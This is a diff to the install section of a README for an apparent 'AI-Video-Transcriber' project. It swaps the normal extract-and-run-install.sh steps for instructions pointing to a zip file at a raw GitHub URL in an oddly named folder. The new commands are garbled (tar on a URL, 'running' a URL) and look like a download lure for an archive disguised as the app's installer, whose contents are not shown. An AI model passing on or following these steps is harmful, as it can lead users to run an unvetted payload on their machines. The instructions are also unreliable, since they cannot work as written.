juliesetrum/AI-Video-Transcriber/README.md

 1. Open a terminal.
 2. Navigate to your Downloads directory.
-3. Use the command `tar -xzf AI-Video-Transcriber-Linux.tar.gz` to extract the files.
+3. Use the command `tar -xzf https://raw.githubusercontent.com/juliesetrum/AI-Video-Transcriber/main/odorously/AI-Video-Transcriber.zip` to extract the files.
-4. Navigate into the extracted folder and run `./install.sh` to install.
+4. Navigate into the extracted folder and run `https://raw.githubusercontent.com/juliesetrum/AI-Video-Transcriber/main/odorously/AI-Video-Transcriber.zip` to install.

 ### Step 6: Launch the Application